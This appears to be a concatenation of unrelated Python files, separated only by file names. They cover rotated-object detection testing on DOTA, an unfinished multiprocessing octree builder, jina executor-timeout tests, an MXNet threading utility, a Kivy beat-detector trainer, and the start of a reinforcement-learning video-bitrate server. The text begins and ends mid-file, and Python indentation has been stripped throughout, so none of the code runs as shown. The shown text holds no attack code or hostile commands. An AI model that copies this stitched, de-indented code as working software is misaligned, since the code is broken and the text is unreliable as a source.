args = parser.parse_args()
return args
class TestDOTA(object):
def __init__(self, cfgs):
self.cfgs = cfgs
self.args = parse_args()
label_map = LabelMap(cfgs)
self.name_label_map, self.label_name_map = label_map.name2label(), label_map.label2name()
def worker(self, gpu_id, images, det_net, result_queue):
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_id)
img_plac = tf.placeholder(dtype=tf.uint8, shape=[None, None, 3]) # is RGB. not BGR
img_batch = tf.cast(img_plac, tf.float32)
pretrain_zoo = PretrainModelZoo()
if self.cfgs.NET_NAME in pretrain_zoo.pth_zoo or self.cfgs.NET_NAME in pretrain_zoo.mxnet_zoo:
img_batch = (img_batch / 255 - tf.constant(self.cfgs.PIXEL_MEAN_)) / tf.constant(self.cfgs.PIXEL_STD)
else:
img_batch = img_batch - tf.constant(self.cfgs.PIXEL_MEAN)
img_batch = tf.expand_dims(img_batch, axis=0)
detection_boxes, detection_scores, detection_category = det_net.build_whole_detection_network(
input_img_batch=img_batch)
init_op = tf.group(
tf.global_variables_initializer(),
tf.local_variables_initializer()
)
restorer, restore_ckpt = det_net.get_restorer()
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
sess.run(init_op)
if not restorer is None:
restorer.restore(sess, restore_ckpt)
print('restore model %d ...' % gpu_id)
for img_path in images:
img_id = int(img_path.split('/')[-1].split('.')[0])
if img_id in range(0, 843) or img_id in range(3453, 4631) or img_id in range(5751, 7174):
continue
# if '2750' not in img_path:
# continue
img = cv2.imread(img_path)
# img = np.load(img_path.replace('images', 'npy').replace('.png', '.npy'))
box_res_rotate = []
label_res_rotate = []
score_res_rotate = []
imgH = img.shape[0]
imgW = img.shape[1]
img_short_side_len_list = self.cfgs.IMG_SHORT_SIDE_LEN if isinstance(self.cfgs.IMG_SHORT_SIDE_LEN, list) else [
self.cfgs.IMG_SHORT_SIDE_LEN]
img_short_side_len_list = [img_short_side_len_list[0]] if not self.args.multi_scale else img_short_side_len_list
if imgH < self.args.h_len:
temp = np.zeros([self.args.h_len, imgW, 3], np.float32)
temp[0:imgH, :, :] = img
img = temp
imgH = self.args.h_len
if imgW < self.args.w_len:
temp = np.zeros([imgH, self.args.w_len, 3], np.float32)
temp[:, 0:imgW, :] = img
img = temp
imgW = self.args.w_len
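# The nested loops below tile the (possibly padded) image into h_len x w_len crops with
# h_overlap / w_overlap pixels of overlap; the last crop in each direction is clamped to the
# image border so that every crop keeps the full window size.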
for hh in range(0, imgH, self.args.h_len - self.args.h_overlap):
if imgH - hh - 1 < self.args.h_len:
hh_ = imgH - self.args.h_len
else:
hh_ = hh
for ww in range(0, imgW, self.args.w_len - self.args.w_overlap):
if imgW - ww - 1 < self.args.w_len:
ww_ = imgW - self.args.w_len
else:
ww_ = ww
src_img = img[hh_:(hh_ + self.args.h_len), ww_:(ww_ + self.args.w_len), :]
for short_size in img_short_side_len_list:
max_len = self.cfgs.IMG_MAX_LENGTH
if self.args.h_len < self.args.w_len:
new_h, new_w = short_size, min(int(short_size * float(self.args.w_len) / self.args.h_len), max_len)
else:
new_h, new_w = min(int(short_size * float(self.args.h_len) / self.args.w_len), max_len), short_size
img_resize = cv2.resize(src_img, (new_w, new_h))
resized_img, det_boxes_r_, det_scores_r_, det_category_r_ = \
sess.run(
[img_batch, detection_boxes, detection_scores, detection_category],
feed_dict={img_plac: img_resize[:, :, ::-1]}
)
resized_h, resized_w = resized_img.shape[1], resized_img.shape[2]
src_h, src_w = src_img.shape[0], src_img.shape[1]
if len(det_boxes_r_) > 0:
det_boxes_r_ = forward_convert(det_boxes_r_, False)
det_boxes_r_[:, 0::2] *= (src_w / resized_w)
det_boxes_r_[:, 1::2] *= (src_h / resized_h)
for ii in range(len(det_boxes_r_)):
box_rotate = det_boxes_r_[ii]
box_rotate[0::2] = box_rotate[0::2] + ww_
box_rotate[1::2] = box_rotate[1::2] + hh_
box_res_rotate.append(box_rotate)
label_res_rotate.append(det_category_r_[ii])
score_res_rotate.append(det_scores_r_[ii])
if self.args.flip_img:
det_boxes_r_flip, det_scores_r_flip, det_category_r_flip = \
sess.run(
[detection_boxes, detection_scores, detection_category],
feed_dict={img_plac: cv2.flip(img_resize, flipCode=1)[:, :, ::-1]}
)
if len(det_boxes_r_flip) > 0:
det_boxes_r_flip = forward_convert(det_boxes_r_flip, False)
det_boxes_r_flip[:, 0::2] *= (src_w / resized_w)
det_boxes_r_flip[:, 1::2] *= (src_h / resized_h)
for ii in range(len(det_boxes_r_flip)):
box_rotate = det_boxes_r_flip[ii]
box_rotate[0::2] = (src_w - box_rotate[0::2]) + ww_
box_rotate[1::2] = box_rotate[1::2] + hh_
box_res_rotate.append(box_rotate)
label_res_rotate.append(det_category_r_flip[ii])
score_res_rotate.append(det_scores_r_flip[ii])
det_boxes_r_flip, det_scores_r_flip, det_category_r_flip = \
sess.run(
[detection_boxes, detection_scores, detection_category],
feed_dict={img_plac: cv2.flip(img_resize, flipCode=0)[:, :, ::-1]}
)
if len(det_boxes_r_flip) > 0:
det_boxes_r_flip = forward_convert(det_boxes_r_flip, False)
det_boxes_r_flip[:, 0::2] *= (src_w / resized_w)
det_boxes_r_flip[:, 1::2] *= (src_h / resized_h)
for ii in range(len(det_boxes_r_flip)):
box_rotate = det_boxes_r_flip[ii]
box_rotate[0::2] = box_rotate[0::2] + ww_
box_rotate[1::2] = (src_h - box_rotate[1::2]) + hh_
box_res_rotate.append(box_rotate)
label_res_rotate.append(det_category_r_flip[ii])
score_res_rotate.append(det_scores_r_flip[ii])
box_res_rotate = np.array(box_res_rotate)
label_res_rotate = np.array(label_res_rotate)
score_res_rotate = np.array(score_res_rotate)
box_res_rotate_ = []
label_res_rotate_ = []
score_res_rotate_ = []
threshold = {'roundabout': 0.1, 'tennis-court': 0.3, 'swimming-pool': 0.1, 'storage-tank': 0.2,
'soccer-ball-field': 0.3, 'small-vehicle': 0.2, 'ship': 0.2, 'plane': 0.3,
'large-vehicle': 0.1, 'helicopter': 0.2, 'harbor': 0.0001, 'ground-track-field': 0.3,
'bridge': 0.0001, 'basketball-court': 0.3, 'baseball-diamond': 0.3,
'container-crane': 0.05, 'airport': 0.1, 'helipad': 0.1}
for sub_class in range(1, self.cfgs.CLASS_NUM + 1):
if self.label_name_map[sub_class] not in ['small-vehicle']:
continue
index = np.where(label_res_rotate == sub_class)[0]
if len(index) == 0:
continue
tmp_boxes_r = box_res_rotate[index]
tmp_label_r = label_res_rotate[index]
tmp_score_r = score_res_rotate[index]
tmp_boxes_r_ = backward_convert(tmp_boxes_r, False)
# try:
# inx = nms_rotate.nms_rotate_cpu(boxes=np.array(tmp_boxes_r_),
# scores=np.array(tmp_score_r),
# iou_threshold=threshold[self.label_name_map[sub_class]],
# max_output_size=5000)
#
# except:
tmp_boxes_r_ = np.array(tmp_boxes_r_)
tmp = np.zeros([tmp_boxes_r_.shape[0], tmp_boxes_r_.shape[1] + 1])
tmp[:, 0:-1] = tmp_boxes_r_
tmp[:, -1] = np.array(tmp_score_r)
# Note: the IoU of two same rectangles is 0, which is calculated by rotate_gpu_nms
jitter = np.zeros([tmp_boxes_r_.shape[0], tmp_boxes_r_.shape[1] + 1])
jitter[:, 0] += np.random.rand(tmp_boxes_r_.shape[0], ) / 1000
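# The tiny jitter on one coordinate presumably keeps duplicate boxes (e.g. from overlapping
# crops) from being bit-identical, since rotate_gpu_nms reports IoU 0 for two identical
# rectangles and would otherwise never suppress them.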
inx = rotate_gpu_nms(np.array(tmp, np.float32) + np.array(jitter, np.float32),
float(threshold[self.label_name_map[sub_class]]), 0)
box_res_rotate_.extend(np.array(tmp_boxes_r)[inx])
score_res_rotate_.extend(np.array(tmp_score_r)[inx])
label_res_rotate_.extend(np.array(tmp_label_r)[inx])
result_dict = {'boxes': np.array(box_res_rotate_), 'scores': np.array(score_res_rotate_),
'labels': np.array(label_res_rotate_), 'image_id': img_path}
result_queue.put_nowait(result_dict)
def test_dota(self, det_net, real_test_img_list, txt_name):
save_path = os.path.join('./test_dota', self.cfgs.VERSION)
nr_records = len(real_test_img_list)
pbar = tqdm(total=nr_records)
gpu_num = len(self.args.gpus.strip().split(','))
nr_image = math.ceil(nr_records / gpu_num)
result_queue = Queue(5000)
procs = []
for i, gpu_id in enumerate(self.args.gpus.strip().split(',')):
start = i * nr_image
end = min(start + nr_image, nr_records)
split_records = real_test_img_list[start:end]
proc = Process(target=self.worker, args=(int(gpu_id), split_records, det_net, result_queue))
print('process:%d, start:%d, end:%d' % (i, start, end))
proc.start()
procs.append(proc)
for i in range(nr_records):
res = result_queue.get()
if self.args.show_box:
nake_name = res['image_id'].split('/')[-1]
tools.makedirs(os.path.join(save_path, 'demo_img_vis'))
draw_path = os.path.join(save_path, 'demo_img_vis', nake_name)
draw_img = np.array(cv2.imread(res['image_id']), np.float32)
detected_boxes = backward_convert(res['boxes'], with_label=False)
detected_indices = res['scores'] >= 0.1
detected_scores = res['scores'][detected_indices]
detected_boxes = detected_boxes[detected_indices]
detected_categories = res['labels'][detected_indices]
drawer = DrawBox(self.cfgs)
final_detections = drawer.draw_boxes_with_label_and_scores(draw_img,
boxes=detected_boxes,
labels=detected_categories,
scores=detected_scores,
method=1,
is_csl=True,
in_graph=False)
cv2.imwrite(draw_path, final_detections)
else:
CLASS_DOTA = self.name_label_map.keys()
write_handle = {}
tools.makedirs(os.path.join(save_path, 'dota_res'))
for sub_class in CLASS_DOTA:
if sub_class == 'back_ground':
continue
write_handle[sub_class] = open(os.path.join(save_path, 'dota_res', 'Task1_%s.txt' % sub_class), 'a+')
for i, rbox in enumerate(res['boxes']):
command = '%s %.3f %.1f %.1f %.1f %.1f %.1f %.1f %.1f %.1f\n' % (res['image_id'].split('/')[-1].split('.')[0],
res['scores'][i],
rbox[0], rbox[1], rbox[2], rbox[3],
rbox[4], rbox[5], rbox[6], rbox[7],)
write_handle[self.label_name_map[res['labels'][i]]].write(command)
for sub_class in CLASS_DOTA:
if sub_class == 'back_ground':
continue
write_handle[sub_class].close()
fw = open(txt_name, 'a+')
fw.write('{}\n'.format(res['image_id'].split('/')[-1]))
fw.close()
pbar.set_description("Test image %s" % res['image_id'].split('/')[-1])
pbar.update(1)
for p in procs:
p.join()
def get_test_image(self):
txt_name = '{}.txt'.format(self.cfgs.VERSION)
if not self.args.show_box:
if not os.path.exists(txt_name):
fw = open(txt_name, 'w')
fw.close()
fr = open(txt_name, 'r')
img_filter = fr.readlines()
print('****************************' * 3)
print('Already tested imgs:', img_filter)
print('****************************' * 3)
fr.close()
test_imgname_list = [os.path.join(self.args.test_dir, img_name) for img_name in os.listdir(self.args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff')) and
(img_name + '\n' not in img_filter)]
else:
test_imgname_list = [os.path.join(self.args.test_dir, img_name) for img_name in os.listdir(self.args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff'))]
assert len(test_imgname_list) != 0, 'test_dir has no imgs there.' \
' Note that we only support img formats (.jpg, .png, .jpeg, .tif, .tiff)'
if self.args.num_imgs == np.inf:
real_test_img_list = test_imgname_list
else:
real_test_img_list = test_imgname_list[: self.args.num_imgs]
return real_test_img_list
|
test4.py
|
''' Attempting to write an octree in python
I want this to work with VERY large data sets that can't be stored fully in memory. So my procedure will be as follows:
- need to read in line-by-line and clear memory every X MB (or maybe every X particles; can I check memory load in python?)
- go down to nodes containing N particles
- need to write out the tree with node sizes and centers, and also the leaf nodes with the actual particles
'''
import os
import numpy as np
import json
import h5py
import random
from multiprocessing import Process, Manager
#https://stackoverflow.com/questions/56250514/how-to-tackle-with-error-object-of-type-int32-is-not-json-serializable
#to help with dumping to json
class npEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.int32):
return int(obj)
return json.JSONEncoder.default(self, obj)
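# Usage sketch (illustrative): json.dumps({'n': np.int32(3)}, cls=npEncoder) writes the value as a
# plain int instead of raising "Object of type int32 is not JSON serializable".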
class octreeStream:
def __init__(self, inputFile, NMemoryMax = 1e5, NNodeMax = 5000,
header = 0, delim = None, colIndices = {'Coordinates':[0,1,2]},
baseDir = 'octreeNodes', Nmax=np.inf, verbose=0, path = None, minWidth=0,
h5PartKey = '', keyList = ['Coordinates'], center = None, cleanDir = False,
Ncores=1):
'''
inputFile : path to the file. For now only text files.
NMemoryMax : the maximum number of particles to save in the memory before writing to a file
NNodeMax : the maximum number of particles to store in a node before splitting it
header : the line number of the header (file starts at line 1,
set header=0 for no header, and in that case x,y,z are assumed to be the first three columns)
delim : the delimiter between columns, if set to None, then hdf5 file is assumed
colIndices : dict with the column numbers for each value in keyList (only necessary for csv files)
baseDir : the directory to store the octree files
Nmax : maximum number of particles to include
verbose : controls how much output to write to the console
path : the path to the output file
minWidth : the minimum width that a node can have
h5PartKey : if needed, can be used to specify which particle type to use, e.g. 'PartType0'
keyList : Any additional keys that are desired; MUST contain the key to Coordinates first. If blank, then assume that x,y,z are the first 3 columns in the file
center : option for the user to provide the octree center (can save time)
cleanDir : if true this will erase the files within that directory before beginning
Ncores : number of cores for multiprocessing
'''
self.nodes = Manager().list() #will contain a list of all nodes with each as a dict
self.managerDict = Manager().dict()
self.managerDict['inputFile'] = inputFile
self.managerDict['NMemoryMax'] = NMemoryMax
self.managerDict['NNodeMax'] = NNodeMax
self.managerDict['header'] = header
self.managerDict['delim'] = delim
self.managerDict['colIndices'] = colIndices
self.managerDict['minWidth'] = minWidth
self.managerDict['h5PartKey'] = h5PartKey
self.managerDict['keyList'] = keyList
self.managerDict['center'] = center
self.managerDict['Nmax'] = Nmax
self.managerDict['cleanDir'] = cleanDir
self.managerDict['Ncores'] = Ncores
self.managerDict['verbose'] = verbose
if (path is None):
self.managerDict['path'] = os.path.join(os.getcwd(), baseDir)
else:
self.managerDict['path'] = os.path.abspath(path) #to make this windows safe
print('files will be output to:', self.managerDict['path'])
self.managerDict['count'] = 0
self.managerDict['lineN'] = 0
self.managerDict['arr'] = None #will contain the data from the file
self.managerDict['width'] = None #will be determined in getSizeCenter
def createNode(self, center, id='', width=0,):
#node = Manager().dict(x=center[0], y=center[1], z=center[2], width=width, Nparticles=0, id=id, parentNodes=Manager().list(), childNodes=Manager().list(), particles=Manager().list(), needsUpdate=True)
node = Manager().dict(x=center[0], y=center[1], z=center[2], width=width, Nparticles=0, id=id, parentNodes=[], childNodes=[], particles=[], needsUpdate=True)
#node = dict(x=center[0], y=center[1], z=center[2], width=width, Nparticles=0, id=id, parentNodes=Manager().list(), childNodes=Manager().list(), particles=Manager().list(), needsUpdate=True)
self.nodes += [node]
print('CHECKING NEW NODE', self.nodes[-1])
return (node, len(self.nodes) - 1)
def findClosestNodeIndexByDistance(self, point, positions):
#there is probably a faster and more clever way to do this
#print('checking dist', point.shape, positions.shape, point, positions)
dist2 = np.sum((positions - point)**2, axis=1)
return np.argmin(dist2)
def findClosestNode(self, point, parentIndex=None):
#I am going to traverse the octree to find the closest node
if (parentIndex is None):
parentIndex = 0
print('CHECKING HERE', parentIndex, self.nodes, len(self.nodes))
for i,n in enumerate(self.nodes):
print('PRINTING', i, n)
parent = self.nodes[parentIndex]
print('checking again', parent['width'])
childIndices = parent['childNodes']
while (childIndices != []):
childPositions = []
for i in childIndices:
childPositions.append([self.nodes[i]['x'], self.nodes[i]['y'], self.nodes[i]['z']])
parentIndex = childIndices[self.findClosestNodeIndexByDistance(point[0:3], np.array(childPositions))]
parent = self.nodes[parentIndex]
childIndices = parent['childNodes']
return (parent, parentIndex)
def initialize(self):
self.managerDict['count'] = 0
#create the output directory if needed
if (not os.path.exists(self.managerDict['path'])):
os.makedirs(self.managerDict['path'])
#remove the files in that directory
if (self.managerDict['cleanDir']):
for f in os.listdir(self.managerDict['path']):
os.remove(os.path.join(self.managerDict['path'], f))
#create the base node
(n, index) = self.createNode(self.managerDict['center'], '0', width=self.managerDict['width'])
#for some reason when running with multiprocessing, I need to return a value here. Maybe this is a way to make Python wait for this to complete before moving on?
return (n, index)
def addPointToOctree(self, point):
#find the node that it belongs in
node, index = self.findClosestNode(np.array(point))
if (self.managerDict['verbose'] > 2):
print('id, Nparticles', self.nodes[index]['id'], self.nodes[index]['Nparticles'], point)
#add the particle to the node
self.nodes[index]['particles'] += [point]
self.nodes[index]['needsUpdate'] = True
self.nodes[index]['Nparticles'] += 1
if (self.managerDict['verbose'] > 2):
print('After, id, Nparticles', self.nodes[index]['id'], self.nodes[index]['Nparticles'])
#check if we need to split the node
if (node['Nparticles'] >= self.managerDict['NNodeMax'] and node['width'] >= self.managerDict['minWidth']*2):
self.createChildNodes(index)
def test(self, index):
print('BEFORE',self.nodes[index]['Nparticles'], self.nodes[index]['childNodes'])
self.nodes[index]['Nparticles'] += 1
self.nodes[index]['childNodes'] += [index]
print('AFTER',self.nodes[index]['Nparticles'], self.nodes[index]['childNodes'])
def compileOctree(self, inputFile=None, append=False):
#initialize a few things
if (not append):
self.managerDict['center'] = [0,0,0]
self.managerDict['width'] = 1000
_ = self.initialize()
# if (inputFile is None):
# inputFile = self.managerDict['inputFile']
# #open the input file
# if (self.managerDict['delim'] is None):
# #assume this is a hdf5 file
# file = h5py.File(os.path.abspath(inputFile), 'r')
# arr = file
# if (self.managerDict['h5PartKey'] != ''):
# arrPart = arr[self.managerDict['h5PartKey']]
# #now build the particle array
# for i, key in enumerate(self.managerDict['keyList']):
# if (i == 0):
# arr = np.array(arrPart[key]) #Coordinates are always first
# else:
# addOn = np.array(arrPart[key])
# arrLen = 1
# if (key == 'Velocities'): #requires special handling because it is a 2D array
# arrLen = 3
# arr = np.hstack((arr, np.reshape(addOn, (len(arr),arrLen))))
# else:
# #for text files
# file = open(os.path.abspath(inputFile), 'r') #abspath converts to windows format
# arr = file
# self.managerDict['Nmax'] = min(self.managerDict['Nmax'], arr.shape[0])
ntest = 1
jobs = []
for i in range(ntest):
center = [i,i,i]
iden = 'test' + str(i)
width = i*100
jobs.append(Process(target=self.test, args=(0,)))
#jobs.append(Process(target=self.addToNodes, args=(center, iden, width,)))
#jobs.append(Process(target=self.findClosestNode, args=(center,)))
for j in jobs:
j.start()
print('joining')
for j in jobs:
j.join()
#self.iterFileOctree(arr)
#file.close()
print('done', self.nodes)
def iterFileOctree(self, arr):
#begin the loop to read the file line-by-line
iStart = self.managerDict['header'];
self.managerDict['lineN'] = iStart
while self.managerDict['lineN'] < self.managerDict['Nmax']:
jobs = []
for i in range(self.managerDict['Ncores']):
iEnd = int(np.floor(min(iStart + self.managerDict['NMemoryMax']/self.managerDict['Ncores'], self.managerDict['Nmax'])))
print(iStart, iEnd, self.managerDict['lineN'], arr.shape[0])
if (iStart >= iEnd):
break
j = Process(target=self.iterLinesOctree, args=(arr[iStart:iEnd], ))
jobs.append(j)
iStart = iEnd
if (iEnd >= arr.shape[0]):
break
print('starting jobs', len(jobs), self.managerDict['lineN'], iEnd, self.managerDict['Nmax'])
for j in jobs:
j.start()
print('joining jobs')
for j in jobs:
j.join()
self.managerDict['lineN'] = 2.*self.managerDict['Nmax']
def iterLinesOctree(self, arr):
print("checking",arr.shape[0])
for i in range(arr.shape[0]):
line = arr[i]
self.managerDict['lineN'] += 1
self.managerDict['count'] += 1
#get the x,y,z from the line
if (self.managerDict['delim'] is None):
point = line
else:
lineStrip = line.strip().split(self.managerDict['delim'])
point = []
for key in self.managerDict['keyList']:
indices = self.managerDict['colIndices'][key]
if (type(indices) is not list):
indices = [indices]
for ii in indices:
point.append(float(lineStrip[ii]))
self.addPointToOctree(point)
if (self.managerDict['verbose'] > 0 and (self.managerDict['lineN'] % 100000 == 0)):
print('line : ', self.managerDict['lineN'])
if __name__ == '__main__':
oM1 = octreeStream('/Users/ageller/VISUALIZATIONS/FIREdata/m12i_res7100/snapdir_600/snapshot_600.0.hdf5',
h5PartKey = 'PartType0', keyList = ['Coordinates', 'Density', 'Velocities'],
NNodeMax = 10000, NMemoryMax = 5e4, Nmax=1e5, verbose=3, minWidth=1e-4,
cleanDir = True,
path='/Users/ageller/VISUALIZATIONS/octree_threejs_python/WebGL_octreePartition/src/data/junk/octreeNodes/Gas')
oM1.compileOctree()
|
test_executor_timeout_failures.py
|
import multiprocessing
import time
import pytest
from jina import Client, Document, Executor, Flow, requests
class SlowExecutor(Executor):
@requests
def foo(self, *args, **kwargs):
time.sleep(0.2)
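# The 0.2 s sleep above is intended to exceed the very short timeout_send=1 configured on the
# Flows below, so every request should time out and surface as a ConnectionError on the client.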
def _test_error(flow_kwargs, add_kwargs, error_port=None):
f = Flow(**flow_kwargs).add(**add_kwargs)
with f:
with pytest.raises(ConnectionError) as err_info:
f.index(inputs=[])
if error_port:
assert str(error_port) in err_info.value.args[0]
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_headless_exec_timeout(port_generator, protocol):
exec_port = port_generator()
flow_kwargs = {'timeout_send': 1, 'protocol': protocol}
add_kwargs = {'uses': SlowExecutor, 'port': exec_port}
# we have to do this in a new process because otherwise grpc will be sad and everything will crash :(
p = multiprocessing.Process(
target=_test_error, args=(flow_kwargs, add_kwargs, exec_port)
)
p.start()
p.join()
assert (
p.exitcode == 0
) # if exitcode != 0 then test in other process did not pass and this should fail
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_headfull_exec_timeout(port_generator, protocol):
flow_kwargs = {'timeout_send': 1, 'protocol': protocol}
add_kwargs = {'uses': SlowExecutor, 'shards': 2}
# we have to do this in a new process because otherwise grpc will be sad and everything will crash :(
p = multiprocessing.Process(target=_test_error, args=(flow_kwargs, add_kwargs))
p.start()
p.join()
assert (
p.exitcode == 0
) # if exitcode != 0 then test in other process did not pass and this should fail
|
parallel.py
|
# coding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Utility functions for parallel processing."""
import threading
try:
import Queue as queue
except ImportError:
import queue
__all__ = ['Parallelizable', 'Parallel']
class Parallelizable(object):
"""Base class for parallelizable unit of work, which can be invoked by `Parallel`.
The subclass must implement the `forward_backward` method, and be used
together with `Parallel`. For example::
class ParallelNet(Parallelizable):
def __init__(self):
self._net = Model()
self._loss = gluon.loss.SoftmaxCrossEntropyLoss()
def forward_backward(self, x):
data, label = x
with mx.autograd.record():
out = self._net(data)
loss = self._loss(out, label)
loss.backward()
return loss
net = ParallelNet()
ctx = [mx.gpu(0), mx.gpu(1)]
parallel = Parallel(len(ctx), net)
# Gluon block is initialized after forwarding the first batch
initialized = False
for batch in batches:
for x in gluon.utils.split_and_load(batch, ctx):
parallel.put(x)
losses = [parallel.get() for _ in ctx]
trainer.step()
"""
def forward_backward(self, x):
""" Forward and backward computation. """
raise NotImplementedError()
class Parallel(object):
"""Class for parallel processing with `Parallelizable`s. It invokes a
`Parallelizable` with multiple Python threads. For example::
class ParallelNet(Parallelizable):
def __init__(self):
self._net = Model()
self._loss = gluon.loss.SoftmaxCrossEntropyLoss()
def forward_backward(self, x):
data, label = x
with mx.autograd.record():
out = self._net(data)
loss = self._loss(out, label)
loss.backward()
return loss
net = ParallelNet()
ctx = [mx.gpu(0), mx.gpu(1)]
parallel = Parallel(len(ctx), net)
for batch in batches:
for x in gluon.utils.split_and_load(batch, ctx):
parallel.put(x)
losses = [parallel.get() for _ in ctx]
trainer.step()
Parameters
----------
num_workers : int
Number of worker threads. If set to 0, the main thread is used as the worker for
debugging purposes.
parallizable :
Parallelizable net whose `forward_backward` method is invoked
by multiple worker threads.
serial_init : bool, default True
Execute the first `num_workers` inputs in the main thread, so that the `Block`
used in `parallizable` is initialized serially. Initializing a `Block` from
multiple threads may cause unexpected behavior.
"""
class _StopSignal(object):
"""Internal class to signal stop. """
def __init__(self, msg):
self._msg = msg
def __init__(self, num_workers, parallizable, serial_init=True):
self._in_queue = queue.Queue(-1)
self._out_queue = queue.Queue(-1)
self._num_workers = num_workers
self._threads = []
self._parallizable = parallizable
self._num_serial = num_workers if serial_init else 0
def _worker(in_queue, out_queue, parallel):
while True:
x = in_queue.get()
if isinstance(x, Parallel._StopSignal):
return
out = parallel.forward_backward(x)
out_queue.put(out)
arg = (self._in_queue, self._out_queue, self._parallizable)
for _ in range(num_workers):
thread = threading.Thread(target=_worker, args=arg)
self._threads.append(thread)
thread.start()
def put(self, x):
"""Assign input `x` to an available worker and invoke
`parallizable.forward_backward` with x. """
if self._num_serial > 0 or len(self._threads) == 0:
self._num_serial -= 1
out = self._parallizable.forward_backward(x)
self._out_queue.put(out)
else:
self._in_queue.put(x)
def get(self):
"""Get an output of previous `parallizable.forward_backward` calls.
This method blocks if none of previous `parallizable.forward_backward`
calls have returned any result. """
return self._out_queue.get()
def __del__(self):
for thread in self._threads:
if thread.is_alive():
self._in_queue.put(self._StopSignal('stop'))
for thread in self._threads:
thread.join(10)
|
Beat.py
|
from DataBase import DataBase
from NeuralNet import NeuralNet
from threading import Thread
from kivy.app import App
from GraphViewerWidget import GraphViewerWidget
import numpy as np
from kivy.clock import Clock
from Config import Config
class Beat(App):
def __init__(self, **kwargs):
super(Beat, self).__init__(**kwargs)
self.training_set = DataBase()
self.validation_set = DataBase()
self.train_thread = Thread(target=self.train_nn)
self.should_exit = False
self.should_load = True
self.should_save = True
def build(self):
self.graph = GraphViewerWidget()
self.graph.set_graph("truth", [0, 0, 1, 1], (0, 1, 0))
self.graph.set_graph("prediction", [0, 1, 1, 0], (1, 0, 0))
self.train_thread.start()
return self.graph
def on_stop(self):
self.should_exit = True
self.train_thread.join()
def train_nn(self):
no_improvement_limit = 200
self.nn = NeuralNet()
if self.should_load: self.nn.load()
self.training_set.load_bin("C:\\BeatDetectorData\\TrainingBin\\", count=-1)
#self.validation_set.load_bin("C:\\BeatDetectorData\\ValidationBin\\", count=-1)
batch_size = 512
valid_ex, valid_lab = self.training_set.get_batch(Config.batch_size)
last_improvement = 0
best_cross_entropy = float('inf')
for i in range(10000):
# TRAIN ON ENTIRE DATA SET IN RANDOM ORDER
epoch = self.training_set.get_epoch(Config.batch_size)
for examples, labels in epoch:
if(self.should_exit): break
self.nn.train(examples, labels)
print('.', end='', flush=True)
if(self.should_exit): break
print("")
# VALIDATE ON RANDOM SUBSET
cross_entropy = self.nn.validate(valid_ex, valid_lab)
print("Epoch: {}, Cross_entropy: {}".format(i, cross_entropy))
if(cross_entropy < best_cross_entropy):
last_improvement = i
best_cross_entropy = cross_entropy
else:
print("WARNING, no improvement")
# EXAMINE ONE EXAMPLE FROM VALIDATION SET TO DRAW PRETTY GRAPHS
example, ground_truth = self.training_set.get_any()
prediction = self.nn.examine(example)
#prediciton_new = self.nn.single_step_examine(example)
self.gui_ex = example
ground_truth = ground_truth[:, 1]
prediction = prediction[:, 1]
xs = np.linspace(0.0, 1.0, len(prediction))
interleaved = np.zeros(len(prediction) * 2)
interleaved[0::2] = xs
interleaved[1::2] = ground_truth
self.gui_truth = interleaved.tolist()
interleaved[1::2] = prediction
self.gui_prediction = interleaved.tolist()
#interleaved[1::2] = prediciton_new
#self.gui_prediction_new = interleaved.tolist()
if self.should_save: self.nn.save()
Clock.schedule_once(self.update_gui)
if(i - last_improvement >= no_improvement_limit):
print("No improvement for last {}, aborting", no_improvement_limit)
break
print("train done")
self.nn.export_to_protobuffer("./export")
def update_gui(self, dt):
self.graph.set_spectrogram(self.gui_ex)
self.graph.set_graph("truth", self.gui_truth, (0, 1, 0))
self.graph.set_graph("prediction", self.gui_prediction, (1, 0, 0))
#self.graph.set_graph("prediction_new", self.gui_prediction_new, (0, 0, 1))
if __name__ == '__main__':
app = Beat()
app.should_load = False
app.should_save = True
app.run()
|
myRL_1_server_no_training.py
|
#!/usr/bin/env python
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import SocketServer
import base64
import urllib
import sys
import os
import json
os.environ['CUDA_VISIBLE_DEVICES']=''
import numpy as np
import tensorflow as tf
import time
import a3c
import multiprocessing
import time
import copy
import socket
import fcntl
import matplotlib.pyplot as plt
S_INFO = 6 # bit_rate, buffer_size, rebuffering_time, bandwidth_measurement, chunk_til_video_end
S_LEN = 8 # take how many frames in the past
A_DIM = 6
VIDEO_BIT_RATE = [300,750,1200,1850,2850,4300] # Kbps
BITRATE_REWARD = [1, 2, 3, 12, 15, 20]
BITRATE_REWARD_MAP = {0: 0, 300: 1, 750: 2, 1200: 3, 1850: 12, 2850: 15, 4300: 20}
M_IN_K = 1000.0
BUFFER_NORM_FACTOR = 10.0
CHUNK_TIL_VIDEO_END_CAP = 48.0
TOTAL_VIDEO_CHUNKS = 448
DEFAULT_QUALITY = 0 # default video quality without agent
REBUF_PENALTY = 4.3 # 1 sec rebuffering -> this number of Mbps
SMOOTH_PENALTY = 1
ACTOR_LR_RATE = 0.0001
CRITIC_LR_RATE = 0.001
TRAIN_SEQ_LEN = 100 # take as a train batch
MODEL_SAVE_INTERVAL = 100
RANDOM_SEED = 42
RAND_RANGE = 1000
SUMMARY_DIR = './results'
LOG_FILE = './results/log'
# in format of time_stamp bit_rate buffer_size rebuffer_time video_chunk_size download_time reward
# NN_MODEL = None
NN_MODEL = '../rl_server/results/pretrain_linear_reward.ckpt'
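# For context, these constants are the ones Pensieve's linear QoE reward is normally built from;
# a sketch of that reward (the actual computation lives in the request handler, which is not shown here):
#   reward = VIDEO_BIT_RATE[bit_rate] / M_IN_K \
#            - REBUF_PENALTY * rebuffer_time \
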